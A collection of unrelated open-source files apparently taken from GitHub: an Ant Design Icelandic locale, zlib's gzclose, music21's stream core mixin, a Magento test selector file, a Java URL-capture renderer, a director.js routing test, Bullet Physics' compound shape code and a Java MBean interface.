"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports["default"] = void 0; var _is_IS = _interopRequireDefault(require("rc-pagination/lib/locale/is_IS")); var _is_IS2 = _interopRequireDefault(require("../date-picker/locale/is_IS")); var _is_IS3 = _interopRequireDefault(require("../time-picker/locale/is_IS")); var _is_IS4 = _interopRequireDefault(require("../calendar/locale/is_IS")); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { "default": obj }; } var localeValues = { locale: 'is', Pagination: _is_IS["default"], DatePicker: _is_IS2["default"], TimePicker: _is_IS3["default"], Calendar: _is_IS4["default"], Table: { filterTitle: 'Afmarkanir', filterConfirm: 'Staðfesta', filterReset: 'Núllstilla', selectAll: 'Velja allt', selectInvert: 'Viðsnúa vali' }, Modal: { okText: 'Áfram', cancelText: 'Hætta við', justOkText: 'Í lagi' }, Popconfirm: { okText: 'Áfram', cancelText: 'Hætta við' }, Transfer: { searchPlaceholder: 'Leita hér', itemUnit: 'færsla', itemsUnit: 'færslur' }, Upload: { uploading: 'Hleð upp...', removeFile: 'Fjarlægja skrá', uploadError: 'Villa við að hlaða upp', previewFile: 'Forskoða skrá', downloadFile: 'Hlaða niður skrá' }, Empty: { description: 'Engin gögn' } }; var _default = localeValues; exports["default"] = _default;
{ "pile_set_name": "Github" }
/* gzclose.c -- zlib gzclose() function * Copyright (C) 2004, 2010 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ #include "gzguts.h" /* gzclose() is in a separate file so that it is linked in only if it is used. That way the other gzclose functions can be used instead to avoid linking in unneeded compression or decompression routines. */ int ZEXPORT gzclose(file) gzFile file; { #ifndef NO_GZCOMPRESS gz_statep state; if (file == NULL) return Z_STREAM_ERROR; state = (gz_statep)file; return state->mode == GZ_READ ? gzclose_r(file) : gzclose_w(file); #else return gzclose_r(file); #endif }
{ "pile_set_name": "Github" }
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Name: stream/core.py # Purpose: mixin class for the core elements of Streams # # Authors: Michael Scott Cuthbert # Christopher Ariza # # Copyright: Copyright © 2008-2015 Michael Scott Cuthbert and the music21 Project # License: BSD, see license.txt # ----------------------------------------------------------------------------- ''' the Stream Core Mixin handles the core attributes of streams that should be thought of almost as private values and not used except by advanced programmers who need the highest speed in programming. Nothing here promises to be stable. The music21 team can make any changes here for efficiency reasons while being considered backwards compatible so long as the public methods that call this remain stable. All functions here will eventually begin with `.core`. ''' # pylint: disable=attribute-defined-outside-init import unittest from music21 import spanner from music21 import tree from music21.exceptions21 import StreamException, ImmutableStreamException class StreamCoreMixin: def __init__(self): # hugely important -- keeps track of where the _elements are # the _offsetDict is a dictionary where id(element) is the # index and the index and the offset is the value. self._offsetDict = {} # self._elements stores Music21Object objects. self._elements = [] # self._endElements stores Music21Objects found at # the highestTime of this Stream. self._endElements = [] self.isSorted = True # v4! # self._elementTree = tree.trees.ElementTree(source=self) def coreInsert(self, offset, element, *, ignoreSort=False, setActiveSite=True ): ''' N.B. -- a "core" method, not to be used by general users. Run .insert() instead. A faster way of inserting elements that does no checks, just insertion. Only be used in contexts that we know we have a proper, single Music21Object. Best for usage when taking objects in a known Stream and creating a new Stream When using this method, the caller is responsible for calling Stream.coreElementsChanged after all operations are completed. Do not mix coreInsert with coreAppend operations. Returns boolean if the Stream is now sorted. ''' # environLocal.printDebug(['coreInsert', 'self', self, # 'offset', offset, 'element', element]) # need to compare highest time before inserting the element in # the elements list storeSorted = False if not ignoreSort: # # if sorted and our insertion is > the highest time, then # # are still inserted # if self.isSorted is True and self.highestTime <= offset: # storeSorted = True if self.isSorted is True: ht = self.highestTime if ht < offset: storeSorted = True elif ht == offset: if not self._elements: storeSorted = True else: highestSortTuple = self._elements[-1].sortTuple() thisSortTuple = list(element.sortTuple()) thisSortTuple[1] = offset thisSortTuple = tuple(thisSortTuple) if highestSortTuple < thisSortTuple: storeSorted = True self.setElementOffset(element, float(offset), addElement=True, setActiveSite=setActiveSite) element.sites.add(self) # need to explicitly set the activeSite of the element # will be sorted later if necessary self._elements.append(element) # self._elementTree.insert(float(offset), element) return storeSorted def coreAppend(self, element, setActiveSite=True): ''' N.B. -- a "core" method, not to be used by general users. Run .append() instead. Low level appending; like `coreInsert` does not error check, determine elements changed, or similar operations. When using this method, the caller is responsible for calling Stream.coreElementsChanged after all operations are completed. ''' # NOTE: this is not called by append, as that is optimized # for looping multiple elements ht = self.highestTime self.setElementOffset(element, ht, addElement=True) element.sites.add(self) # need to explicitly set the activeSite of the element if setActiveSite: self.coreSelfActiveSite(element) self._elements.append(element) # Make this faster # self._elementTree.insert(self.highestTime, element) # does not change sorted state if element.duration is not None: self._setHighestTime(ht + element.duration.quarterLength) # -------------------------------------------------------------------------- # adding and editing Elements and Streams -- all need to call coreElementsChanged # most will set isSorted to False def coreElementsChanged( self, *, updateIsFlat=True, clearIsSorted=True, memo=None, keepIndex=False): ''' NB -- a "core" stream method that is not necessary for most users. This method is called automatically any time the elements in the Stream are changed. However, it may be called manually in case sites or other advanced features of an element have been modified. It was previously a private method and for most users should still be treated as such. The various arguments permit optimizing the clearing of cached data in situations when completely dropping all cached data is excessive. >>> a = stream.Stream() >>> a.isFlat True Here we manipulate the private `._elements` storage (which generally shouldn't be done) and thus need to call `.coreElementsChanged` directly. >>> a._elements.append(stream.Stream()) >>> a.isFlat # this is wrong. True >>> a.coreElementsChanged() >>> a.isFlat False ''' # experimental if not self._mutable: raise ImmutableStreamException( '_coreElementsChanged should not be triggered on an immutable stream' ) if memo is None: memo = [] memo.append(id(self)) # WHY??? THIS SEEMS OVERKILL, esp. since the first call to .sort() in .flat will # invalidate it! TODO: Investigate if this is necessary and then remove if not necessary # should not need to do this... # if this Stream is a flat representation of something, and its # elements have changed, than we must clear the cache of that # ancestor so that subsequent calls get a new representation of this derivation; # we can do that by calling coreElementsChanged on # the derivation.origin if self._derivation is not None: sdm = self._derivation.method if sdm in ('flat', 'semiflat'): origin = self._derivation.origin if sdm in origin._cache and origin._cache[sdm] is self: del origin._cache[sdm] # may not always need to clear cache of all living sites, but may # always be a good idea since .flat has changed etc. # should not need to do derivation.origin sites. for livingSite in self.sites: livingSite.coreElementsChanged() # clear these attributes for setting later if clearIsSorted: self.isSorted = False if updateIsFlat: self.isFlat = True # do not need to look in _endElements for e in self._elements: # only need to find one case, and if so, no longer flat # fastest method here is isinstance() # if isinstance(e, Stream): if e.isStream: self.isFlat = False break # resetting the cache removes lowest and highest time storage # a slight performance optimization: not creating unless needed if self._cache: indexCache = None if keepIndex and 'index' in self._cache: indexCache = self._cache['index'] # always clear cache when elements have changed # for instance, Duration will change. # noinspection PyAttributeOutsideInit self._cache = {} if keepIndex and indexCache is not None: self._cache['index'] = indexCache def coreHasElementByMemoryLocation(self, objId): ''' NB -- a "core" stream method that is not necessary for most users. use hasElement(obj) Return True if an element object id, provided as an argument, is contained in this Stream. >>> s = stream.Stream() >>> n1 = note.Note('g') >>> n2 = note.Note('g#') >>> s.append(n1) >>> s.coreHasElementByMemoryLocation(id(n1)) True >>> s.coreHasElementByMemoryLocation(id(n2)) False ''' if objId in self._offsetDict: return True for e in self._elements: if id(e) == objId: # pragma: no cover return True for e in self._endElements: if id(e) == objId: # pragma: no cover return True return False def coreGetElementByMemoryLocation(self, objId): ''' NB -- a "core" stream method that is not necessary for most users. Low-level tool to get an element based only on the object id. This is not the same as getElementById, which refers to the id attribute which may be manually set and not unique. However, some implementations of python will reuse object locations, sometimes quickly, so don't keep these around. Used by spanner and variant. >>> s = stream.Stream() >>> n1 = note.Note('g') >>> n2 = note.Note('g#') >>> s.append(n1) >>> s.coreGetElementByMemoryLocation(id(n1)) is n1 True >>> s.coreGetElementByMemoryLocation(id(n2)) is None True >>> b = bar.Barline() >>> s.storeAtEnd(b) >>> s.coreGetElementByMemoryLocation(id(b)) is b True ''' # NOTE: this may be slightly faster than other approaches # as it does not sort. for e in self._elements: if id(e) == objId: return e for e in self._endElements: if id(e) == objId: return e return None # -------------------------------------------------------------------------- def coreGuardBeforeAddElement(self, element, *, checkRedundancy=True): ''' Before adding an element, this method provides important checks to that element. Used by both insert() and append() Returns None or raises a StreamException >>> s = stream.Stream() >>> s.coreGuardBeforeAddElement(s) Traceback (most recent call last): music21.exceptions21.StreamException: this Stream cannot be contained within itself ''' # using id() here b/c we do not want to get __eq__ comparisons if element is self: # cannot add this Stream into itself raise StreamException('this Stream cannot be contained within itself') if checkRedundancy: idElement = id(element) if idElement in self._offsetDict: # now go slow for safety -- maybe something is amiss in the index. # this should not happen, but we have slipped many times in not clearing out # old _offsetDict entries. for search_place in (self._elements, self._endElements): for eInStream in search_place: if eInStream is element: raise StreamException( f'the object ({element!r}, id()={id(element)} ' + f'is already found in this Stream ({self!r}, id()={id(self)})' ) # something was old... delete from _offsetDict # environLocal.warn('stale object') del self._offsetDict[idElement] # pragma: no cover # if we do not purge locations here, we may have ids() for # Streams that no longer exist stored in the locations entry for element. # Note that dead locations are also purged from .sites during # all get() calls. element.purgeLocations() def coreStoreAtEnd(self, element, setActiveSite=True): ''' NB -- this is a "core" method. Use .storeAtEnd() instead. Core method for adding end elements. To be called by other methods. ''' self.setElementOffset(element, 'highestTime', addElement=True) element.sites.add(self) # need to explicitly set the activeSite of the element if setActiveSite: self.coreSelfActiveSite(element) # self._elements.append(element) self._endElements.append(element) @property def spannerBundle(self): ''' A low-level object for Spanner management. This is a read-only property. ''' if 'spannerBundle' not in self._cache or self._cache['spannerBundle'] is None: sf = self.flat sp = sf.spanners.stream() self._cache['spannerBundle'] = spanner.SpannerBundle(sp) return self._cache['spannerBundle'] def asTimespans(self, classList=None, flatten=True): r''' Convert stream to a :class:`~music21.tree.trees.TimespanTree` instance, a highly optimized data structure for searching through elements and offsets. >>> score = tree.makeExampleScore() >>> scoreTree = score.asTimespans() >>> print(scoreTree) <TimespanTree {20} (0.0 to 8.0) <music21.stream.Score exampleScore>> <ElementTimespan (0.0 to 0.0) <music21.clef.BassClef>> <ElementTimespan (0.0 to 0.0) <music21.meter.TimeSignature 2/4>> <ElementTimespan (0.0 to 0.0) <music21.instrument.Instrument 'PartA: : '>> <ElementTimespan (0.0 to 0.0) <music21.clef.BassClef>> <ElementTimespan (0.0 to 0.0) <music21.meter.TimeSignature 2/4>> <ElementTimespan (0.0 to 0.0) <music21.instrument.Instrument 'PartB: : '>> <PitchedTimespan (0.0 to 1.0) <music21.note.Note C>> <PitchedTimespan (0.0 to 2.0) <music21.note.Note C#>> <PitchedTimespan (1.0 to 2.0) <music21.note.Note D>> <PitchedTimespan (2.0 to 3.0) <music21.note.Note E>> <PitchedTimespan (2.0 to 4.0) <music21.note.Note G#>> <PitchedTimespan (3.0 to 4.0) <music21.note.Note F>> <PitchedTimespan (4.0 to 5.0) <music21.note.Note G>> <PitchedTimespan (4.0 to 6.0) <music21.note.Note E#>> <PitchedTimespan (5.0 to 6.0) <music21.note.Note A>> <PitchedTimespan (6.0 to 7.0) <music21.note.Note B>> <PitchedTimespan (6.0 to 8.0) <music21.note.Note D#>> <PitchedTimespan (7.0 to 8.0) <music21.note.Note C>> <ElementTimespan (8.0 to 8.0) <music21.bar.Barline type=final>> <ElementTimespan (8.0 to 8.0) <music21.bar.Barline type=final>> ''' hashedAttributes = hash((tuple(classList or ()), flatten)) cacheKey = "timespanTree" + str(hashedAttributes) if cacheKey not in self._cache or self._cache[cacheKey] is None: hashedTimespanTree = tree.fromStream.asTimespans(self, flatten=flatten, classList=classList) self._cache[cacheKey] = hashedTimespanTree return self._cache[cacheKey] def coreSelfActiveSite(self, el): ''' Set the activeSite of el to be self. Override for SpannerStorage, VariantStorage, which should never become the activeSite ''' el.activeSite = self def asTree(self, flatten=False, classList=None, useTimespans=False, groupOffsets=False): ''' Returns an elementTree of the score, using exact positioning. See tree.fromStream.asTree() for more details. >>> score = tree.makeExampleScore() >>> scoreTree = score.asTree(flatten=True) >>> scoreTree <ElementTree {20} (0.0 <0.-25...> to 8.0) <music21.stream.Score exampleScore>> ''' hashedAttributes = hash((tuple(classList or ()), flatten, useTimespans, groupOffsets)) cacheKey = "elementTree" + str(hashedAttributes) if cacheKey not in self._cache or self._cache[cacheKey] is None: hashedElementTree = tree.fromStream.asTree(self, flatten=flatten, classList=classList, useTimespans=useTimespans, groupOffsets=groupOffsets) self._cache[cacheKey] = hashedElementTree return self._cache[cacheKey] def coreGatherMissingSpanners(self, recurse=True, requireAllPresent=True, insert=True): ''' find all spanners that are referenced by elements in the (recursed if recurse=True) stream and either inserts them in the Stream (if insert is True) or returns them if insert is False. If requireAllPresent is True (default) then only those spanners whose complete spanned elements are in the Stream are returned. Because spanners are stored weakly in .sites this is only guaranteed to find the spanners in cases where the spanner is in another stream that is still active. Here's a little helper function since we'll make the same Stream several times: >>> def getStream(): ... s = stream.Stream() ... n = note.Note('C') ... m = note.Note('D') ... sl = spanner.Slur(n, m) ... n.bogusAttributeNotWeakref = sl # prevent garbage collecting sl ... s.append([n, m]) ... return s >>> s = getStream() >>> s.show('text') {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> >>> s.coreGatherMissingSpanners() >>> s.show('text') {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> {1.0} <music21.note.Note D> Insert is False: >>> s = getStream() >>> spList = s.coreGatherMissingSpanners(insert=False) >>> spList [<music21.spanner.Slur <music21.note.Note C><music21.note.Note D>>] >>> s.show('text') {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> Not all elements are present: >>> s = getStream() >>> s.remove(s[-1]) >>> s.show('text') {0.0} <music21.note.Note C> >>> s.coreGatherMissingSpanners() >>> s.show('text') {0.0} <music21.note.Note C> >>> s.coreGatherMissingSpanners(requireAllPresent=False) >>> s.show('text') {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> Test recursion: >>> t = stream.Part() >>> s = getStream() >>> t.insert(0, s) >>> t.coreGatherMissingSpanners(recurse=False) >>> t.show('text') {0.0} <music21.stream.Stream 0x104935b00> {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> Default: with recursion: >>> t.coreGatherMissingSpanners() >>> t.show('text') {0.0} <music21.stream.Stream 0x104935b00> {0.0} <music21.note.Note C> {1.0} <music21.note.Note D> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> Make sure that spanners already in the stream are not put there twice: >>> s = getStream() >>> sl = s[0].getSpannerSites()[0] >>> s.insert(0, sl) >>> s.coreGatherMissingSpanners() >>> s.show('text') {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> {1.0} <music21.note.Note D> And with recursion? >>> t = stream.Part() >>> s = getStream() >>> sl = s[0].getSpannerSites()[0] >>> s.insert(0, sl) >>> t.insert(0, s) >>> t.coreGatherMissingSpanners() >>> t.show('text') {0.0} <music21.stream.Stream 0x104935b00> {0.0} <music21.note.Note C> {0.0} <music21.spanner.Slur <music21.note.Note C><music21.note.Note D>> {1.0} <music21.note.Note D> ''' sb = self.spannerBundle if recurse is True: sIter = self.recurse() else: sIter = self.iter collectList = [] for el in list(sIter): for sp in el.getSpannerSites(): if sp in sb: continue if sp in collectList: continue if requireAllPresent: allFound = True for spannedElement in sp.getSpannedElements(): if spannedElement not in sIter: allFound = False break if allFound is False: continue collectList.append(sp) if insert is False: return collectList else: for sp in collectList: self.coreInsert(0, sp) self.coreElementsChanged(updateIsFlat=False) # timing before: Macbook Air 2012, i7 # In [3]: timeit('s = stream.Stream()', setup='from music21 import stream', number=100000) # Out[3]: 1.6291376419831067 # after adding subclass -- actually faster, showing the rounding error: # In [2]: timeit('s = stream.Stream()', setup='from music21 import stream', number=100000) # Out[2]: 1.5247003990225494 class Test(unittest.TestCase): def runTest(self): pass if __name__ == '__main__': import music21 music21.mainTest(Test)
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!-- /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ --> <sections xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="urn:magento:mftf:Page/etc/SectionObject.xsd"> <section name="AdminGridFilterControls"> <element name="filters" type="button" selector=".admin__data-grid-header[data-bind='afterRender: \$data.setToolbarNode'] button[data-action='grid-filter-expand']" timeout="5"/> <element name="applyFilters" type="button" selector="button[data-action='grid-filter-apply']" timeout="30"/> <element name="cancel" type="button" selector="button[data-action='grid-filter-cancel']" timeout="30"/> <element name="clearAll" type="button" selector="(//*[contains(@class, 'admin__data-grid-header')][contains(@data-bind, 'afterRender: \$data.setToolbarNode')]//button[contains(@data-action, 'reset')])[1]" timeout="5"/> </section> </sections>
{ "pile_set_name": "Github" }
package org.incode.module.docrendering.stringinterpolator.dom.impl; import java.io.IOException; import java.net.URL; import java.util.List; import javax.inject.Inject; import org.apache.isis.applib.services.config.ConfigurationService; import org.isisaddons.module.stringinterpolator.dom.StringInterpolatorService; import org.incode.module.docrendering.stringinterpolator.dom.spi.UrlDownloaderService; import org.incode.module.document.dom.impl.renderers.RendererFromCharsToBytes; import org.incode.module.document.dom.impl.types.DocumentType; public class RendererForStringInterpolatorCaptureUrl implements RendererFromCharsToBytes { @Override public byte[] renderCharsToBytes( final DocumentType documentType, final String variant, final String atPath, final long templateVersion, final String templateChars, final Object dataModel) throws IOException { final URL url = previewCharsToBytes(documentType, atPath, templateVersion, templateChars, dataModel); for (UrlDownloaderService downloaderService : downloaderServices) { if(downloaderService.canDownload(url)) { return downloaderService.download(url); } } throw new IllegalStateException("No downloader service available to download from " + url); } protected URL previewCharsToBytes( final DocumentType documentType, final String atPath, final long templateVersion, final String templateChars, final Object dataModel) throws IOException { final StringInterpolatorService.Root root = (StringInterpolatorService.Root) dataModel; final String urlStr = stringInterpolator.interpolate(root, templateChars); return new URL(urlStr); } @Inject List<UrlDownloaderService> downloaderServices; @Inject StringInterpolatorService stringInterpolator; @Inject ConfigurationService configurationService; }
{ "pile_set_name": "Github" }
/* * path-test.js: Tests for the core `.path()` method. * * (C) 2011, Charlie Robbins, Paolo Fragomeni, & the Contributors. * MIT LICENSE * */ var assert = require('assert'), vows = require('vows'), director = require('../../../lib/director'); vows.describe('director/core/path').addBatch({ "An instance of director.Router": { topic: function () { var that = this; that.matched = {}; that.matched['foo'] = []; that.matched['newyork'] = []; var router = new director.Router({ '/foo': function () { that.matched['foo'].push('foo'); } }); return router; }, "the path() method": { "should create the correct nested routing table": function (router) { var that = this; router.path('/regions', function () { this.on('/:state', function(country) { that.matched['newyork'].push('new york'); }); }); assert.isFunction(router.routes.foo.on); assert.isObject(router.routes.regions); assert.isFunction(router.routes.regions['([._a-zA-Z0-9-%()]+)'].on); }, "should dispatch the function correctly": function (router) { router.dispatch('on', '/regions/newyork') router.dispatch('on', '/foo'); assert.equal(this.matched['foo'].length, 1); assert.equal(this.matched['newyork'].length, 1); assert.equal(this.matched['foo'][0], 'foo'); assert.equal(this.matched['newyork'][0], 'new york'); } } } }).export(module);
{ "pile_set_name": "Github" }
/* Bullet Continuous Collision Detection and Physics Library Copyright (c) 2003-2009 Erwin Coumans http://bulletphysics.org This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. */ #include "btCompoundShape.h" #include "btCollisionShape.h" #include "BulletCollision/BroadphaseCollision/btDbvt.h" #include "LinearMath/btSerializer.h" btCompoundShape::btCompoundShape(bool enableDynamicAabbTree, const int initialChildCapacity) : m_localAabbMin(btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT)), m_localAabbMax(btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT)), m_dynamicAabbTree(0), m_updateRevision(1), m_collisionMargin(btScalar(0.)), m_localScaling(btScalar(1.), btScalar(1.), btScalar(1.)) { m_shapeType = COMPOUND_SHAPE_PROXYTYPE; if (enableDynamicAabbTree) { void* mem = btAlignedAlloc(sizeof(btDbvt), 16); m_dynamicAabbTree = new (mem) btDbvt(); btAssert(mem == m_dynamicAabbTree); } m_children.reserve(initialChildCapacity); } btCompoundShape::~btCompoundShape() { if (m_dynamicAabbTree) { m_dynamicAabbTree->~btDbvt(); btAlignedFree(m_dynamicAabbTree); } } void btCompoundShape::addChildShape(const btTransform& localTransform, btCollisionShape* shape) { m_updateRevision++; //m_childTransforms.push_back(localTransform); //m_childShapes.push_back(shape); btCompoundShapeChild child; child.m_node = 0; child.m_transform = localTransform; child.m_childShape = shape; child.m_childShapeType = shape->getShapeType(); child.m_childMargin = shape->getMargin(); //extend the local aabbMin/aabbMax btVector3 localAabbMin, localAabbMax; shape->getAabb(localTransform, localAabbMin, localAabbMax); for (int i = 0; i < 3; i++) { if (m_localAabbMin[i] > localAabbMin[i]) { m_localAabbMin[i] = localAabbMin[i]; } if (m_localAabbMax[i] < localAabbMax[i]) { m_localAabbMax[i] = localAabbMax[i]; } } if (m_dynamicAabbTree) { const btDbvtVolume bounds = btDbvtVolume::FromMM(localAabbMin, localAabbMax); size_t index = m_children.size(); child.m_node = m_dynamicAabbTree->insert(bounds, reinterpret_cast<void*>(index)); } m_children.push_back(child); } void btCompoundShape::updateChildTransform(int childIndex, const btTransform& newChildTransform, bool shouldRecalculateLocalAabb) { m_children[childIndex].m_transform = newChildTransform; if (m_dynamicAabbTree) { ///update the dynamic aabb tree btVector3 localAabbMin, localAabbMax; m_children[childIndex].m_childShape->getAabb(newChildTransform, localAabbMin, localAabbMax); ATTRIBUTE_ALIGNED16(btDbvtVolume) bounds = btDbvtVolume::FromMM(localAabbMin, localAabbMax); //int index = m_children.size()-1; m_dynamicAabbTree->update(m_children[childIndex].m_node, bounds); } if (shouldRecalculateLocalAabb) { recalculateLocalAabb(); } } void btCompoundShape::removeChildShapeByIndex(int childShapeIndex) { m_updateRevision++; btAssert(childShapeIndex >= 0 && childShapeIndex < m_children.size()); if (m_dynamicAabbTree) { m_dynamicAabbTree->remove(m_children[childShapeIndex].m_node); } m_children.swap(childShapeIndex, m_children.size() - 1); if (m_dynamicAabbTree) m_children[childShapeIndex].m_node->dataAsInt = childShapeIndex; m_children.pop_back(); } void btCompoundShape::removeChildShape(btCollisionShape* shape) { m_updateRevision++; // Find the children containing the shape specified, and remove those children. //note: there might be multiple children using the same shape! for (int i = m_children.size() - 1; i >= 0; i--) { if (m_children[i].m_childShape == shape) { removeChildShapeByIndex(i); } } recalculateLocalAabb(); } void btCompoundShape::recalculateLocalAabb() { // Recalculate the local aabb // Brute force, it iterates over all the shapes left. m_localAabbMin = btVector3(btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT), btScalar(BT_LARGE_FLOAT)); m_localAabbMax = btVector3(btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT), btScalar(-BT_LARGE_FLOAT)); //extend the local aabbMin/aabbMax for (int j = 0; j < m_children.size(); j++) { btVector3 localAabbMin, localAabbMax; m_children[j].m_childShape->getAabb(m_children[j].m_transform, localAabbMin, localAabbMax); for (int i = 0; i < 3; i++) { if (m_localAabbMin[i] > localAabbMin[i]) m_localAabbMin[i] = localAabbMin[i]; if (m_localAabbMax[i] < localAabbMax[i]) m_localAabbMax[i] = localAabbMax[i]; } } } ///getAabb's default implementation is brute force, expected derived classes to implement a fast dedicated version void btCompoundShape::getAabb(const btTransform& trans, btVector3& aabbMin, btVector3& aabbMax) const { btVector3 localHalfExtents = btScalar(0.5) * (m_localAabbMax - m_localAabbMin); btVector3 localCenter = btScalar(0.5) * (m_localAabbMax + m_localAabbMin); //avoid an illegal AABB when there are no children if (!m_children.size()) { localHalfExtents.setValue(0, 0, 0); localCenter.setValue(0, 0, 0); } localHalfExtents += btVector3(getMargin(), getMargin(), getMargin()); btMatrix3x3 abs_b = trans.getBasis().absolute(); btVector3 center = trans(localCenter); btVector3 extent = localHalfExtents.dot3(abs_b[0], abs_b[1], abs_b[2]); aabbMin = center - extent; aabbMax = center + extent; } void btCompoundShape::calculateLocalInertia(btScalar mass, btVector3& inertia) const { //approximation: take the inertia from the aabb for now btTransform ident; ident.setIdentity(); btVector3 aabbMin, aabbMax; getAabb(ident, aabbMin, aabbMax); btVector3 halfExtents = (aabbMax - aabbMin) * btScalar(0.5); btScalar lx = btScalar(2.) * (halfExtents.x()); btScalar ly = btScalar(2.) * (halfExtents.y()); btScalar lz = btScalar(2.) * (halfExtents.z()); inertia[0] = mass / (btScalar(12.0)) * (ly * ly + lz * lz); inertia[1] = mass / (btScalar(12.0)) * (lx * lx + lz * lz); inertia[2] = mass / (btScalar(12.0)) * (lx * lx + ly * ly); } void btCompoundShape::calculatePrincipalAxisTransform(const btScalar* masses, btTransform& principal, btVector3& inertia) const { int n = m_children.size(); btScalar totalMass = 0; btVector3 center(0, 0, 0); int k; for (k = 0; k < n; k++) { btAssert(masses[k] > 0); center += m_children[k].m_transform.getOrigin() * masses[k]; totalMass += masses[k]; } btAssert(totalMass > 0); center /= totalMass; principal.setOrigin(center); btMatrix3x3 tensor(0, 0, 0, 0, 0, 0, 0, 0, 0); for (k = 0; k < n; k++) { btVector3 i; m_children[k].m_childShape->calculateLocalInertia(masses[k], i); const btTransform& t = m_children[k].m_transform; btVector3 o = t.getOrigin() - center; //compute inertia tensor in coordinate system of compound shape btMatrix3x3 j = t.getBasis().transpose(); j[0] *= i[0]; j[1] *= i[1]; j[2] *= i[2]; j = t.getBasis() * j; //add inertia tensor tensor[0] += j[0]; tensor[1] += j[1]; tensor[2] += j[2]; //compute inertia tensor of pointmass at o btScalar o2 = o.length2(); j[0].setValue(o2, 0, 0); j[1].setValue(0, o2, 0); j[2].setValue(0, 0, o2); j[0] += o * -o.x(); j[1] += o * -o.y(); j[2] += o * -o.z(); //add inertia tensor of pointmass tensor[0] += masses[k] * j[0]; tensor[1] += masses[k] * j[1]; tensor[2] += masses[k] * j[2]; } tensor.diagonalize(principal.getBasis(), btScalar(0.00001), 20); inertia.setValue(tensor[0][0], tensor[1][1], tensor[2][2]); } void btCompoundShape::setLocalScaling(const btVector3& scaling) { for (int i = 0; i < m_children.size(); i++) { btTransform childTrans = getChildTransform(i); btVector3 childScale = m_children[i].m_childShape->getLocalScaling(); // childScale = childScale * (childTrans.getBasis() * scaling); childScale = childScale * scaling / m_localScaling; m_children[i].m_childShape->setLocalScaling(childScale); childTrans.setOrigin((childTrans.getOrigin()) * scaling / m_localScaling); updateChildTransform(i, childTrans, false); } m_localScaling = scaling; recalculateLocalAabb(); } void btCompoundShape::createAabbTreeFromChildren() { if (!m_dynamicAabbTree) { void* mem = btAlignedAlloc(sizeof(btDbvt), 16); m_dynamicAabbTree = new (mem) btDbvt(); btAssert(mem == m_dynamicAabbTree); for (int index = 0; index < m_children.size(); index++) { btCompoundShapeChild& child = m_children[index]; //extend the local aabbMin/aabbMax btVector3 localAabbMin, localAabbMax; child.m_childShape->getAabb(child.m_transform, localAabbMin, localAabbMax); const btDbvtVolume bounds = btDbvtVolume::FromMM(localAabbMin, localAabbMax); size_t index2 = index; child.m_node = m_dynamicAabbTree->insert(bounds, reinterpret_cast<void*>(index2)); } } } ///fills the dataBuffer and returns the struct name (and 0 on failure) const char* btCompoundShape::serialize(void* dataBuffer, btSerializer* serializer) const { btCompoundShapeData* shapeData = (btCompoundShapeData*)dataBuffer; btCollisionShape::serialize(&shapeData->m_collisionShapeData, serializer); shapeData->m_collisionMargin = float(m_collisionMargin); shapeData->m_numChildShapes = m_children.size(); shapeData->m_childShapePtr = 0; if (shapeData->m_numChildShapes) { btChunk* chunk = serializer->allocate(sizeof(btCompoundShapeChildData), shapeData->m_numChildShapes); btCompoundShapeChildData* memPtr = (btCompoundShapeChildData*)chunk->m_oldPtr; shapeData->m_childShapePtr = (btCompoundShapeChildData*)serializer->getUniquePointer(memPtr); for (int i = 0; i < shapeData->m_numChildShapes; i++, memPtr++) { memPtr->m_childMargin = float(m_children[i].m_childMargin); memPtr->m_childShape = (btCollisionShapeData*)serializer->getUniquePointer(m_children[i].m_childShape); //don't serialize shapes that already have been serialized if (!serializer->findPointer(m_children[i].m_childShape)) { btChunk* chunk = serializer->allocate(m_children[i].m_childShape->calculateSerializeBufferSize(), 1); const char* structType = m_children[i].m_childShape->serialize(chunk->m_oldPtr, serializer); serializer->finalizeChunk(chunk, structType, BT_SHAPE_CODE, m_children[i].m_childShape); } memPtr->m_childShapeType = m_children[i].m_childShapeType; m_children[i].m_transform.serializeFloat(memPtr->m_transform); } serializer->finalizeChunk(chunk, "btCompoundShapeChildData", BT_ARRAY_CODE, chunk->m_oldPtr); } return "btCompoundShapeData"; }
{ "pile_set_name": "Github" }
package io.craft.atom.io; /** * MBean for {@link IoAcceptor} * * @author mindwind * @version 1.0, Dec 24, 2013 */ public interface IoAcceptorMBean { /** * @return x-ray of {@link IoAcceptor} */ IoAcceptorX x(); }
{ "pile_set_name": "Github" }
